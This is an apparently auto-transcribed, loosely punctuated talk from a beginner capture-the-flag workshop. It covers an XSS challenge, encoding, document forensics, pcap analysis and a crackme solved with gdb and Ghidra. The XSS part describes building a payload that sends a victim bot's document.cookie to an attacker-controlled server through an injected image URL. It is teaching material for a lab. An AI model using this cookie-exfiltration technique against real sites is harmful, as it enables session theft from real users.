can we assign it something will that survive a refresh yes it did what I didn't expect that okay so we have a cookie a test cookie with no content and maybe that's not right we'll we'll troubleshoot it later what we want is to send that cookie to a third party to our local web server that we're gonna run now to do that there are several tricks but creating an image is one of such trick that that works that works that works really well because images they they can be hosted on different servers and you can construct their url by exfiltrating secrets in them so this is kind of a legacy of the web so one one way to inject one way to exfiltrate data is to use to leverage this image image creation pattern so let's search javascript create image how can we do that I don't want to use that can we okay that sounds good and then it appends it to the body so I'm creating this and then image source so image source is gonna be localhost on port 10 000 because why not and then a.gif plus document then cookie and then we need to inject it in the body so that it will be visible right so let's steal this line of thunder and I could have mixed html and html and javascript and I was doing so before but the problem is you quickly enter the realm of you need to nest your your single quotes and your double quotes and this gets super hairy and you have bugs and you can't figure out why actually this strategy is stolen from François Proulx after he saw my first solution to that challenge which was very convoluted and involved like encoding everything as characters and evaluating them with javascript which was was poor paste oh and something you should also always do that I haven't had the discipline to do is take notes all the time so especially for payloads like this that you could lose with a copy paste or with a submission so I like the ASCII doc format but here I'm gonna paste this here so if I lose it I can get back to it so oh nothing happened what does this look like cannot read property happened child of null I do have a body so what was null get element by ID body I don't have that so we want we maybe you know by class do we have something with an ID no we could is there such a thing as the document point body point append okay let's do it like that the console is super helpful as well to understand what you're doing so let's get back to our payload and copy it because you know we're working on it and then here we can avoid this and just do that body and it should work maybe so you you notice that I haven't started a web server so what I kind of expect is the result in the javascript but uh file not found or broken image here we saw a broken image appear connection refused so we haven't stole oh that's not that's not javascript I made a mistake yeah I so I included the document that cookie statement inside the the image source so that was that's a mistake so this this is better and now I'm gonna start the server so I'm gonna copy this and then let's do a python http.server and then 10000 server is running let's paste that here so I'm gonna walk you through it okay so we got what we got is a get request on a.gif and test right after okay so it worked from our perspective now we need to have that executed by larry but let's tweak things just a little bit I will add a question mark here inside the the string because it's gonna be easier to see where the cookie starts right okay and we're gonna save that in our documentation so okay um okay let's let's go through that payload again together so that we are we understand what's going on here okay I'm gonna I'm gonna indent it so it's simpler as I explain it let's not do that okay so we're creating an element an html element in javascript we're assigning it to the variable image we're modifying the source property of that image so that it refers to something web server that we control this web server happens to be localhost because right now I'm testing on myself on port 10000 which I ran on the side and I'm appending on the url I'm appending the contents of the document.cookie and then this would not be alone enough on its own because if the image element doesn't exist in the DOM the browser will not the DOM is the document object model and it's basically what you see in the in chromium's inspect view this is a DOM view where all the nodes are kind of nested nicely and and let's say you do something stupid and the browser does something to figure it out it will be figured out in that view whereas source is what you got as is right with the mistakes and the bad indentation if it's the case so what this does is inject in the DOM this image variable that we created and this makes the browser see oh I have a new image element I need to fetch it and this is the url and it doesn't ask any question it just fetches it so this is what happened now let's take the payload and adapt it to the context of the challenge so we cannot poke localhost we need to poke larry so what we said here is that we can use pivotbox for this task and the hostname is sysandmin ssh so I'm gonna use sysandmin ssh instead of my my localhost here and I'm gonna run it in the port 1012 in the hope that no one's had assigned itself this port before I do run my payload and I keep the document that cookie etc etc okay so let's try that now I need to send a link to larry you remember that that's what we saw fortunately enough this page is badly programmed as you can see this form is not a post it's a get which means that it gets into it gets that it goes into the top and the url bar so the content is there which means that we can send that link to larry and it will execute the javascript code this is called a reflected xss and it's not all the cases that it is like that in some other cases our payload would be even more complicated for example if this would require a post payload you would need to create a completely different page where larry would click but then inside that page in javascript you would do an ajax call with a post to this page I don't know if you followed but if you did you understand xss very well if you didn't just keep in mind that you uh if you give a link to someone it's gonna issue a get and so if if something needs to happen via a post you will need an intermediary page where you use javascript to turn that get into a post yeah so uh i'm gonna run it here so that so this is on system in ssh the reason i'm running it here is that i want the url that i will give larry okay so it's not that i expect any output out of this i won't have any output out of this so search now we have the good with the system in ssh all properly encoded for us for free no need to do url encoding and so on so i'm gonna leave that here i'm gonna go and start the server uh that's pivot box okay let's let's drop the port forward and let's go and access the key pair so i'm connecting to the server we connected in the sysadmin track i'm gonna launch a web server with the right the same port no one was there good and then i'm gonna copy this and give it to larry the link clicker and now i'm gonna say click larry click and we can see here the url was queued and if we go and look did we get something yes we got the flag so again recapping what just happened larry got the url he clicked on it his browser open injected oh there's someone not muted the that we hear breathing if you could just check double check please i think i found it um the so yeah so the this javascript code in the url was reflected inside the page it executed the image insertion appended cookie to the emergence insertion and then uh created an image object with this as a url and then i get a get request for an image uh with with the with the content of the command of the of the cookies which contain the flag whoo that's cool that's cool and this is the people who are good at xss get really good at xss so this is a simple one unfortunately for for you uh but i think i think the theory behind it is really sound and you you should uh at least uh know how to approach challenges like that uh from now on up so we solved it okay encoding yeah it's uh we we can take rewards so encoding computers encode data in various ways and it's always evolving and uh well i mean yes and no but yes you know now we have message pack and protobuf and stuff like that and g rpc uh simpler times uh it was um you know ascii is a sort of encoding but basically we always need to represent binary data or binary information and depending on the protocol we need to avoid specific characters because they are important for that protocol so uh email uh was uh an important example uh because you you need a way to carry files of arbitrary type inside something that was text based and very lightly structured so for email we invented uh uu encoding i think uh for the web we have other types of encoding so we see i see that we have 25 solves so this is a pretty straightforward one many of you solving it a few seconds ago but what i'm gonna what i want to know i guess is that uh this this you should recognize with your eyes this is everywhere if you look at browser headers if you look at many of the easier types of ctfs uh one of the of the things that's that says what it is is the the the trailing uh equal sign and also the character set used but uh trailing equal sign is basically padding for base 64 now there are two ways that you can decode things like this one of them is uh to simply use uh echo and base 64 on the command line and then uh yes so basically echo dash m because you want to remove the new line at the end of the echo and then you pipe this into base 64 dash d for decode and then you get the content okay but this is the the old way the this is very entrenched in my muscle memory this is why i still do it that way but you know you have um you're in ctf 101 we are in and 2021 you guys earn you should use better tools and so one such tool is cyber chef done by the gchq but it's open source and it runs in javascript so it doesn't send all your ctf flag to the gchq so that they can win all the ctfs in the world but maybe it does i don't know but uh i'll take my chances for this time so basically with cyber chef you put your input in the that box at the at the top and then you build a recipe and then at the bottom you have the output um so uh here we could i think there's a magic yeah magic that's funny so magic looks at different stuff and uh tries different things and it failed or it says the entropy and it didn't it didn't do do good so boo magic didn't work uh but so as i told you we know that this is base 64 but this is gonna be really easy and straightforward juste as the command line was um decoded from base 64 you have an option for an alphabet because you can have a custom alphabet and i think in the standard you there is some variations and i've seen some malware who would use base 64 but just reversed the the alphabet because it's our hard coded in the algorithm the as a list of characters and so um so you you try the base 64 decode but it doesn't it doesn't give you result and so you move on but if you would have reversed engineer you would have figured that this was going on and you could have solved earlier the issue it's a it's an orange race right so output of this is in this field you should recognize basic encoding techniques just by looking at them congrats because it just looks like you did here's your flag um cyber chef is way more powerful than what you just saw and it's important to realize the the power of of combining the various tokens and you can also save the recipe with or without the data and in in a couple of formats so it's a good a good way to document the where you're at in a challenge let's see what you are facing a challenge like that so i it's very powerful and useful tool that i strongly recommend learning in some cases i even used it's ocr capabilities so you could let oftentimes you get a challenge where they they try to mess with you they give you like in a badly encoded jpeg like thousands of character and you're like oh never gonna retype all this i'm lost i can't solve it well turns out that uh cyber chef's ocr is good enough that it could of course you'll have to fix a few characters but it's gonna do that 80 20 or even 95 5 job here for you and you can move along faster so i i used it in many different contexts work related and ctf related as well it's very good tool i recommend uh but uh we need to extract this flag here sorry to interrupt but i think we have a question about the excesses challenge in the chat okay yeah sure i think we have time uh which chat the zoom one the zoom one yeah okay so um the user agent that is calling the system in ssh url good question so the setup if we uh basically this mimics a friend that you send links to and that this friend clicks on it so it's to mimic a human but the way it's built for the ctf it's is it a set for a phantom j s or something like that it's basically a bunch of uh of javascript uh spawning uh chrome uh browser and instrumenting it so that it will run the the code and i i know that i struggle building that bot to inject the flag in the cookies so it might not be perfect if you try to have very fancy javascript payloads it might fail on them so all this to say that it's not someone who's clicking on them on it that is on duty tonight waiting for to receive it's uh it's a note j s app that when it gets a script it will issue a command and also if people brute force it or submit many many um submissions it might build a large queue or fall off so if if you think your payload should work uh and it's not working you can share it in the discord on the ctf one on one challenge don't don't share it on the zoom because the chat is just gonna destroy uh it's gonna be ugly uh and and others will be able to uh to participate if you share it on discord and i'll be able to look at it after we close this call as well so share it over there but uh but so it's not a standard user agent and i haven't looked at the user agent variable so it might be a bit confusing or or just just phantom j s i'm not sure okay so i think you posted an answer well well patrick i hope it answered your question yes uh yes patrick uh so patrick said uh it's running server on the server side where ssm ssh can be reached correct it's uh so if you have uh your own server online it will be able to reach it but yes i deployed this container so the application is containerized i deployed this container in the same network as ssm ssh with the magic variables of docker uh for resolving hosts so this is why we can use an unqualified domain like ssm ssh a real payload of course we need either an ip or uh a fully qualified domain uh but in in this context uh you are correct uh it's because it's sitting right besides the system in ssh system you're following well that's good um okay let's move on to the oh did i take the sip i forgot let's let's have one just in case victorie sip for encoding all right so 14 solves already eric is at the top but i think eric it's it's his third year participating in the ctf 101 so don't feel bad because he's on top um so uh this document contains two flags this is the easiest of the two so these forensic let's put in quote challenges are you know it's uh it's a weird territory because for if you're you're not a programmer and you never did excess and you never did binary it's where you will probably end up and lose a bunch of times uh but uh uh the problem is that they uh i don't want to be rude but i'll be i'll be blanks they they fuck you up it's that it's oftentimes not realistic and it's it doesn't connect to reality necessarily sometimes it does sometimes forensic tracks are like real like uh someone got uh ohm then then you arrive and you have a disk image and you need to figure out what happened but these are rare because they are they are hard to recreate challenges like this is hard to do most of the time it's just like i've hidden away binary inside the soundtrack and haha i use the something super custom and you'll need to write fast Fourier transform by hand uh to extract the bits and good luck and and i mean they are cool to do they are time consuming uh but this one here is one that i faced uh it's a it's a recreation of one that i faced at the hack us a couple years ago where we we tried everything and like because you know we were bad at it and we did i didn't solve it but when i was told the answer i was like i'm never gonna forget so so let's go okay so we said a hard one and a easy one let's try the let's try easy let's go easy we have a document you know a couple of pages clearly stolen from some university and that's stolen it's borrowed anyway it's public uh so okay we're looking for flag all and this is important you make links right all the flags so far had flag dash in them so why not do a control f and search for flag and oh we have a hit somewhere in a white area and i this is why i you know i warned you that these can be you know of you know can be can be called the as someone said on the zoom chat can be called the free for all category right um someone is pasting yeah the document is in french but it doesn't matter the flags are flags it's a course plan for a cyber security program that is from 2009 but the this here is clearly just the good old white on white technique and if you change the color of the text aha it's gonna reveal itself right so this is one way to solve it another one that is i guess better and that might be the réflexe that other had because you know opening a word document in in a computer it should be a vm right you don't know what's gonna have it in it so you should do this from a vm and so you need to copy it in your vm it's just more work right so you could just basically strings the thing and uh it turns out that it doesn't reveal much so and this is an old-fashioned doc it's not a doc x which are getting which is getting rarer and rarer but um something that is important uh a learning opportunity here strings by default looks for ascii strings it doesn't look for uh uh microsoft's by default wide strings so let's add the wide string search i think this is dash e l not quite sure oh yeah i got it so uh we see a lot more text now that we added wide strings and why is strings doesn't not doing it by default i don't know to be honest but i always i always run both now uh but so running this running it that way you get basically get 300 uh lines of strings instead of nine so it's it's it's worth doing right um and uh now that we did that the flag was at the end of the document and so here it is right another strategy and this even works for some binary challenges is that you list all of the strings and then you grip without capitalization for flag and boom you got it one liner shell and you you solve everything okay so yeah both both techniques work one of the other approaches that we've i've seen i've heard is you basically cut you do a select tall you take all of the bits from the the information and you paste it in another document and so anything that would be the fonts would be reduced or changes to the document it would reveal itself especially in um in some plain text application for example so let's submit that flag here we go another flag in the same document it's a little harder to find this is the same document as challenge one uh challenge document one and the flag is in french but it still starts with flag dash okay still starts with flag dash cool cool we're gonna we're gonna okay so big now now you're just gonna hate me because the way i'm gonna solve this is by uh clearly showing that i know what's going on right right so what i want you to take away from this is that uh it's the method that is important here and also how mischievous or uncool challenge designer can be uh and and to to have maybe an open mind of of how the solution can be and i want to say earlier i said that there's a challenge that i i will remember all my life and this is it right that's the one so let's let's use that approach that i mentioned earlier of pasting paragraphs in a text editor a standard text editor and looking at it right i'm gonna use vim so we're gonna we're looking at this um okay i can read all this there's nothing unexpected cool all right you notice how i avoided the first paragraph on purpose so now let's go back to the first paragraph paste that here aha little f here there's a capital l here there is a capital a here there's a capital j here what's going on uh am i chopping off i i got a a message from zoom saying it's unstable no it's all right it's all right okay because now i think someone started netflix mais i should be fine i have enough bandwidth let me know if if something's going wrong okay so another hint that we have here is that this is the only paragraph where we have mistakes right so it doesn't look like it looks like something's not right there is a problem and uh so what we could do is just like explode everything and maybe up with this no okay let's put everything in in black oh here we go we see characters appearing so so now we could solve the the the the challenge by you know manually removing trimming stuff down but why not why don't we write a little bit of python so what we're gonna do is we're gonna we're gonna copy this and we're gonna open an ipython console so this is another tool uh that i recommend uh learning and you could use ipython or ipython notebooks uh ah you know what why not show straight ipython notebooks it's better uh whoops ah it said it complained something about you'll likely want to use jupyter notebook okay gonna bring me there and i'm gonna go and come back here this copy so i i have a full workshop about uh jupyter notebook that i do with mesara uh that i i recommend i recommend learning about jupyter notebooks these are these are a very great tool self-documenting to write code uh so basically this is a python interpreter and you can iterate on data easily and you can even graph in it uh rather easily so uh so i to to do some of what i'm i'm about to do it's very nice okay so we copy that string here let's take a look at it okay that's good now we want to split on every word so let's do uh split is this is this the way split like that yes okay cool so now we want to take the last character right this last last last last so last character uh but of every word so we think we're gonna need to be in a list continuation uh n uh four word in this uh oops okay so i'm building a list continuation another very strong python construct uh so basically i'm saying give me all words uh and and this is just a variable name but in this that i split so i'm basically just reassembling it uh but now if i do i want the uh last character if i'm not mistaken no this is reverse uh this is removing the last character just right i heard someone just minus one but you were gonna do it anyways uh yes okay cool so i got i got uh something and now it said that the flag was in french and you can see that eventually this the the the mistakes they stopped right the in the document so uh here there's no no longer a mistake and you can switch your style check there's a bunch of things you can do if you're not native and don't worry this is just because this challenge was made a while ago that it's in french you won't have stuff like that in nord sec uh but so but now it's still like it's still like okay uh i have the flag but it's not not super clear uh what we could do is then with this we could join the list like that and so what we have now is uh oh we have a couple mistakes it's uh it stops working oh this this probably bad the commas are also bad let's get rid of them and the dot all right and the dot here as well okay so we got uh the t here is is another mistake it is a valid french word so it's flag le flag du fin observat commas so there's another comma to fix here we go flag le flag du fin observateur and we can up and we'll happen the capital f at the beginning yep yep yep yep again i know i know i should feel bad showing you something like this but it's a real case of a real flag that we never saw and the it was a teacher a professor at university we created the challenge it was like i can have i messages everywhere and i was like uh he was right um all right so let's move on on network so pcaps i love pcaps because and also every city f has pcaps challenges but i'm a former network person so i forgot the sip of victory so when you have a pcap you you open a wire shark don't ask any more question and that and if you realize you need to scale out of wire shark then do something about it later but wire shark is so powerful you always should rely on it um important aspects of wire shark the oftentimes you'll get garbage with the the the the pcap that you have and maybe sometimes not but here it's a very clean and crisp uh pcap but still there's a lot of stuff right if you ever dive into wire shark you can be like oh this could mean something this could mean something this could mean something so at some point you need to trust several layers of the protocols and uh if you have uh you know formal training on networking you will realize where stuff could be hidden uh but at the same time uh challenges they need to be fun right if if the challenge designer encoded uh with xor pattern uh hidden data in the checksum of the tcp uh you know yeah clap you did uh you did it but uh it's not necessarily a good challenge so uh all this to say that uh network uh pcaps are like other types of forensic challenge some of them can be really fun and great and and challenging others can be just you looking for the needle in the haystack never finding it but once you know it's it takes three seconds to solve so you uh you almost always need to give yourself a break like if after 45 minutes i'm still digging i have no idea what i'm looking at you know send it to someone else shift shift context etc okay what we have here is a ping 2888 um it looks like a request reply it looks like normal ping um and uh we i mean there there's a bunch of a's the the the the layers they they look okay i could i could like do icmp.contains flag i have no result and the dot not that contains but contains is a very powerful verb in wireshark so basically you could query every protocol and ask if it contains something very useful for htp um you have also a bunch of tools and statistics to to see who's chatting with who but this doesn't really apply to this packet uh to this pcap uh but for this specific challenge uh what we'll do is we will uh should i do that okay yeah let's let's try to do a capture on my wi-fi but with a filter for icmp hopefully i won't leak any data okay so i'll ping 8888 and we'll see what we have i don't care so i pinged 8888 so i can compare right oh okay so if i compare i don't get the a's i don't have the same thing so in data i have something different and something that looks like linear right that increases and then 12345 and and so on so uh what what am i looking at that is different than the other the other capture let's reopen it well i have a bunch of effets here and then the reply contains a bunch of effets and we have to remember that ping was used to detect uh problems at the physical layer where there was some bit corruption happening back then um so uh it was important for the payload to be reflected 100% similarly uh back but now we check the second one and it's l f l and we check the third one and it's a it's all capital letter can we do something with it yes so let's go back to uh our jupy eternal book uh oops i shut down started back up okay uh don't restart let's uh save it uh this was the document and then i'm gonna go back home why not save save it and then i'm gonna create a new one for uh the p cap okay well i didn't tell you earlier is that uh the jupy notebook is also an execution environment if you put a dollar bang in front of a command it's gonna be it's gonna run so we can do like something like that pretty cool right so what we're gonna have is a self documenting recipe to solve that p cap using t shark and the command line so what i'm gonna do here is read this p cap which is the name i forgot uh network troubleshooting up all right we're gonna read that so uh i'm a very big wire shark user and i know by heart that if i need to extract the data and okay again this full disclaimer this could be solved by hand for sure 100% the reason i'm showing this to you is that for the harder ctfs what they're gonna do is they're gonna have instead of just the flag in several payload there where there are gonna encode a binary in there in the the payload and that you have like four megabyte of stuff to extract so if you don't script it you will basically spend the weekend just copying the stuff and uh and after that there's an exploitation or a reverse engineering challenge that you need to solve right so i'm showing you like how to approach everything programmatically tonight so i'm gonna do this and as a test to see if it worked i'm gonna extract a field that is very easy to uh gather and this is gonna be uh ip destination why not so uh one way let's yeah let's just go ipvst so the dash t fields in a t-shark is a special construct that puts it in the mode where it wants to uh extract fields only fields and not its usual text output and then every dash e and uh the name of a of a token and wire chart is gonna be extracted and these are gonna be tabs separated so it's kind of csv but it's tabs instead of commas and it's readable by excel and all the good stuff so i'm gonna see does that work okay ip destination 1888122 it does make sense because it's uh destination and then uh source and destination so if we look we are reading that correct okay so now let's move on what we want we want the data payload so the the way to find how to extract the payload is to do uh right click prepare as a filter and then selected and what you'll see above is how wire shark classifies that uh that thing right so this is called data that data if i would look like at for example the icmp type let's say this is what i wanted to extract i would have i would do the prepare as filter trick again and i would see that it's icmp dot type so um i want the data because the rest doesn't seem interesting yet so boom with this i get i have the data now when you run commands in jupiter what you could do is assign it to a python variable very easily so if i do this and i look at data what i have is a list of the output all uh without carriage return at the end now i want the last two characters so we're gonna enter list continuation mode for let's call this t for token in data and let's say that i want the last two characters so that would be uh this i guess alain no so this is going to be the second or last but oh i i want the zero or i think zero for the two last zero now maybe minus one minus one close close but not quite or maybe minus one minus two oh let's forget that or minus three not sure ah oh it's the it's the comma to say like the rest right that's why we have co workshop assistants um the okay so basically minus two and the the column so if i would remove the column i would get only four but if i stick the column i say that i'm doing a sub a list slice up to the end of the list and this is why minus one gave still just one character etc so okay so now we have the last two but we need it uh so we we we want it to be this is hex and we want it to be char's but this is hex so what i could do is cast them as hint as x and this is just python muscle memory uh you know so hex is base 16 and there's there's there might be a fancier method of doing so but but i know that this is gonna work so with this i get a pure because i had quotes around the previous version with this i get pure ints which is good because this is what chr expect because i'm gonna run chr around that and then i get something uh out of it now i would like to drop every one out of two how could i do that so i see two ways of doing that i could here in my iterator uh use a fancy python construct to drop one every out of two but i could also apply a filter capture and say just uh ip destination equals 8888 so i only have one here right many ways to the same thing and then let's use what we used as a trick last time around we join uh we join all of this together and uh we should have something that works so flag network forensic expert so being a programmer is really good for CTF as you can see and i shouldn't say that i'm a programmer so being adequate at programming all right so we're getting into the the the last mile but the the difficult part of the of the of the night and we're gonna so what i'm gonna do is i'm gonna introduce you to the the challenge and uh so we're gonna solve this so we're gonna spend a bunch of time on that because i want you to uh get uh an idea on how to approach binary challenges with um a static approach and a dynamic approach and we're gonna do dynamic first and then static and we're gonna even do a hybrid approach like uh you know using dynamic to get closer to where you want to be and then finish off i forgot how i started my sentence using static to know what you want to avoid and then using dynamic to skip it or to to to work around it right so but first we need to take that sip okay the correct me there are two flavors of it the difference between the the normal version and the hard version is that the hard version is strict so uh uh okay yeah that's good we have we have some time i think so let's take the time of looking at this the difference between the two so i'm gonna download this here uh whoops put it in forensic that's an insult to forensic reverse uh that's an insult to reverse to crack me's and then the hard i'm gonna open guide or we could say and go back and i'm not making fun of anyone i'm just i just love playing with words um yeah that's that's great that's great project name and then project does not exist well created oh no that's okay that's because it's reverse good and we start the dragon so i'm looking at it in static first uh this is not how i would approach it well i mean you should do both anyways or play start with one switch to the other but uh but this is not how i intended to approach it but to show the difference between the two i think this is the best way the best tool so up crack me boom the dragon is crunching analyze it please yes yes and then i import the other one analyze it please all the fault values i my my guide guide setup is very vanilla so you can you know did it did it override it oh no i i never ran two binaries i knew that guide supported it but i never did it um okay so if we look at the the normal one we can see that the they are names and if we go to the main we can see that this is this just looks like code right printf dramatic compute raise printf put char dramatic we see all of the stuff so if we look at the the hard and uh we go in the main oh we don't have a main so we have fun fun is it is it too small i figure you're all on computers so it should be okay but yeah let's do it like that um uh so so basically okay everything that is in in control of the that is within the program boundaries so not the c library not uh syscalls and stuff like that everything in there doesn't have symbols anymore so it's the entries are obfuscated or or stripped basically that's what it's called it's just stripped because you don't need it and it takes space and this this existed in the days where they would save dates using two digits uh years using two digits instead of four because it could save two bytes of memory like this this is how old this stuff is right not this specific binary but but compilers in general um so basically now uh in with this binary you need to figure out the main where is the real main and then once you're in it up look it's the same main and and this you develop a muscle memory like i knew that the entry which is the libc stuff would jump into the main and it would be the first argument so uh so this is the real main written by the user we can also uh rename it uh you know with guide rub but but so we have the set buff and the printf because this comes from the c library but we don't have uh what we had as compute and dramatic actually that's dramatic and that's compute but we do have strings as is right this is not an obfuscator this is just stripped meant for performance or storage or memory storage reasons um but so this is the difference it makes the stuff a little bit harder especially dynamic analysis because you need to refer to add uh memory addresses instead of of using symbolic names um but so for this solve we are uh going to uh use the the the the the the the one the the the one with symbols because it's it's gonna be more straightforward okay now i am going i've been talking non stop for uh two hours so i i'm not sure if i want to take a break or not because i don't want you to leave but i was i was gonna suggest a five minute break is that too much or is that okay with you you can use thumbs up thumbs down to let me know can you maybe not yeah okay so yeah five minute break uh it is called five minute break uh in five minutes we're gonna do the the correct me both dynamic and static if we have time after that we're gonna try the bonus the exploitation challenge so uh i will um i will leave my screen like that just mute myself and i'll be back so we are about to resume checking couple messages before we do okay okay okay okay going to try to show uh yeah very uh so first uh never execute binaries that you don't know where they're they're from on your main system so this should be done inside a vm uh and you know i wrote them and it's okay for you to do so uh today but uh we i've i was aware made aware of open CTFs at DEF CON where they basically you know had the very nefarious commands and it would wipe people's computer if they ran it uh on their machine and and you know this is this is just bad taste uh so be careful but i don't think it will happen at nord sec but sometimes it's not even it's unintended conséquences or you know your your work av getting in the way and and and we always find our challenges in the various totals so yeah it's stuff like that that happens okay so we're gonna keep the guide for later i'm assuming everyone everyone got back uh we don't we're not gonna need the jupiter so i'm gonna just say it and close it we go same with this excellent larry okay so uh reverse and uh so by default the the files will not be executable when you download them they they uh they want oh that's weird oh no that that's not weird actually i was saying that it was smaller when you strip symbols and it's about you know 20 25 26 k smaller so it's oh no sorry not 26 k 3 k smaller so not negligible but still um so in order to run them first you need to make make them executable so we're gonna schmud and then we're gonna use symbolic uh way the symbolic way so we're gonna use user plus x so whatever's there i don't care add x to crack me which means that now it's executable and now i can run it like that so when i run it i see performing intense computation and then flag dash and then at the peak of what i want to see it it seg seg falls so core dump um now the first thing you could do and uh you should do is running uh pdb gdb on it um so your gdb might be way different than mine if yours is vanilla i strongly encourage everyone to avoid vanilla gdb because it's made for c programmer it's not made for people that are reverse engineering binaries without source code so by the fault gdb is very helpful if you have some source code not so if you don't uh and and we're not talking like a small step we're talking like a massive step you know what i actually i should show you so let's let's remove my fancy pwn dbg uh addon okay so this is vanilla gdb on the crack me and so i get this so far so good it's similar but when i run it we see performing intense computation and then i see the error can look at the back trace uh but i got nothing else right uh and i need to remember uh the commands which you have to do also with the fancier gdb but you you in order to look at the stack you need to do uh info frame info registers you need to remember all of that stuff by heart and run it all the time and and you don't you don't know if this is an address uh what's the what's this is this ascii is this is is this not you need to build a lot of muscle memory and so if we would do the same but reactivate my uh i'm using pwn dbg but this is out of laziness i've used peda jeff ge f and uh pwn dbg and i think jeff right now is the the trendy one but uh but i mean they're all good enough so uh if we run it what we will get is a view that is uh helpful that contains and i i probably need to make everything smaller yeah let's go back uh not normal yeah so uh so this basically shows you the registers the disassembly including an arrow where you are at and the stack values and the back trace all the time so if you step uh you get the stuff uh in your face which is very very helpful so it's it's a lot faster to go about what what you do so let's get to the the bug together and so uh right now we are in the raise command which means that we are no longer if you see the the address space we are no longer in our program's address space so we're basically right now debugging raised which is which is is probably not what we want to do um and so uh we're basically we're in this 2d but what is this raised thing and why why is it in the way so let's uh let's take a look at it and i'm gonna open a new window so i can switch back and forth so let's do a man raise this we can maybe make it larger okay so i think to know what man pages is that often you're not in the the good category so clearly this is tk built-in commands tk is a graphic toolkit so this is not where we want to be we're gonna try a man to raise this is not the section maybe a man dash k to find where raise is defined so man three raise so we uh want to be in section three instead of section n which was the tk stuff so in section three we are in the linux programmers manual so send the signal to the caller so uh basically it looks like this program is messing with us it looks like it's it's just trying to kill itself so let's uh run it again it says performing intense computation and then uh it's seg false so uh what we're gonna try to do and this is where we can you know combine static and dynamic because now uh in the binary it's a bit in the weeds so if we go back in here in the the compiler view on the right hand side we see that this raise call so what we're gonna do is we let's look at this function when we are running it dynamically so let's break on the main we have symbols so we just can do b main and we will break and then let's look at this in smd we're gonna quit this start again break on main run and we broke in main now we we see the calls so assembly basically is just a bunch of garbage in between important stuff i know this is making it very simple but to be honest with you 100% honest with you i have no idea what this does i i don't like i know that they are function pro logs and epilogues and it's changing stuff that is important that the compiler generates but when i what i want to be interested in is always you know between the calls and the stuff sometimes you need to understand what's this especially if it's crypto or stuff like that but you know for uh to in order to get into reverse engineering and not be afraid of everything you just need to bite the bullet and accept that some of the stuff is just is just there and you need to plough through it so uh se no m e is the command for a next instruction i think n could work in that context so you can see that the instruction uh we we switched instruction and an important thing about uh low level like this uh you know and when you're close to the cpu is that the cpu works with an instruction pointer so basically this gets incremented and it's a register so it's something that the value that the cpu has and that it gets whenever it executes it gets incremented and it will run the next thing but an instruction pointer can also be set via various means including assembly when call is made but you could also assign it inside the debugger so let's get closer to the the raise okay and you can see the instruction pointer it just goes from the the the value uh that is here to the next one you know linearly predictably uh and and and this is the the the size of the jump that is made depends on the length of the instruction because uh x86 is a variable length instruction set uh so because of that it's not always predictable the the address of the next thing uh so we're in the call so the reason why we do next is we're gonna jump over that call and not into the call so if you would like to jump into the call you would use uh si so step into or step instruction actually but stepping would get you into the call so lo so call and what's nice again with with a plugin like this is that you get the arguments right so we see that we uh we have this uh in a format string so on the stack in the case of this function uh and and it's this that is gonna be printed and if we run the instruction we can see that it was printed and since we are debugging on the same output as uh the programming is running this mixes up the output like that right uh to avoid that what you could do is attach to something being debug running in a different terminal so depending on what you're doing these are all options that you could consider and the more you do the more familiar will be with stuff like that so now we are at dramatic we see uh so the uh this here the arguments are put into the registers and this is a convention uh that is followed by compilers and libraries and shell code could avoid stuff like that so the dramatic was this long thing where the tree dots get sprinted now let's move forward compute we don't know what it is uh but it happens um and we wanted to get to the raise right so we're moving forward oh now we see the call with to the flag with a dash and here is flag with the dash it was print out and now we're at the call to raise point okay and i told you earlier that uh if we set the instruction pointer we can uh change the state of the CPU and execute something else for this specific process so let's jump over the call by setting rip to this address let's see what it will do so set rip equals this address boom we avoided the the raise and now we can do c for continue or we could step you know next instruction and then we're moving forward by the way when you put you press enter it's uh doing the same command as your last input so now i can just keep doing command and we should get stuff out so now it's doing a bunch of stuff right and if we take a look at the guidera output after the raise was this loop where characters would be printed in groups of two so if you look at the format string definition uh is it documented in the main pages so again this is the data i want this the it's probably not the kernel thing but oh no it's there okay so in the section three there is all of the variants of printf and we can so basically you have all you need to look up what the what does that zero mean so zero means it should be padded x means that it will be converted to unsigned x so basically it's taking something binary and or or not binary necessarily a char pointer and outputting it as x now uh so when we are debugging uh do we do we necessarily want to go through all of that well i mean we could but one of the thing that you'll notice as we get close to the print so the call to print it's that the output boom is here right so the output is at the corner so we'll have one character at the time which is very annoying so we should have let go of the debugging and to do so is just see for continue and so we get the the rest of the of the string so by skipping the raise we successfully printed the flag so let's start over again but this time uh we chopped the beginning right so we're gonna redo this but making sure we get the whole thing in one screen breaking on main actually we could break on raise so let's run it so r for run so we're at main uh yeah so let's continue it will break on raise so on it broke in okay so that's not a good advice because it broke it break in the libc raise so we need to do that we need to do so before we enter that stage uh because it's too late otherwise or we could but it's it would be complicated because we need the registers to be all sane so break on main and then we're gonna step from main continue or run and then next instruction and then we run dramatic compute print and then up okay and then here we set rip to the instruction afterwards and we continue and then we get the whole hex sequence now um we we did see a flag dash being printed so we probably don't have the whole uh thing right we need to append flag dash before and then boom we are correct now let's see other ways we could have done this so uh you have to understand that uh raise is sending a signal and when you run a program in a debugger you can trap signals actually by default you trap signals so another way to solve this which is kind of uh uncool for me to show you at this time is you run it it says that it received a signal and you say yeah sure but continue and then boom it prints the flag so you trap the signal but you told the binary to continue executing and it printed the flag and this is uh another way uh by understanding you know how stuff is going on that that you can achieve your your your goal and uh the the the reason is that uh in in linux or in unix is as an on caught signal will uh terminate or will uh trash a program and maybe it's not all signals but i mean some signals are just handled by the kernel the process is not even aware but uh most signals are going to terminate a program but in a debugger you can choose to continue or do whatever you want with it now that was the dynamic approach now let's go and try to solve it instead uh in a static static way so we have we can look around right so we can dig into dramatic uh if we double click we see inside dramatic what we have is a little loop param one so param one what was param one if we go back it's three so there is a value of three that is given here and and when it's uh when there are no references to a function so it's called just once and uh it's the other references are not uh code related you you can if you want uh basically rename a variable in a way that you will know what's the value right so it's a constant and it's three so you basically this is a four three and it does a sleep one and then outputs uh zero x to e by now we know that this is a dot but if we would like to make our our listing the compiler listing prettier we can't change the convert the output type here we need to go in uh the main view of guide rub but here and these are always in sync right you'll see i click on a sleep i'm in front of sleep but charm in front of put char so i know that arguments will come before because it's executed from the top down and uh and now this uh value which by the way it reuses the area that i labeled const three which makes this a little bit confusing but this est ce qu'il y a des compilers, ils utilisent les registres et en ce cas c'est un variable ils utilisent eux agressivément si ils savent qu'ils n'ont pas de conflits et donc ils font des trucs comme ça mais mais ici on peut convertir le type dans l'assemblée à une séquence de char de dot et ça sera visible ici et ça peut arriver ici on a un 0xa on peut convertir à une séquence de char et maintenant on a notre return 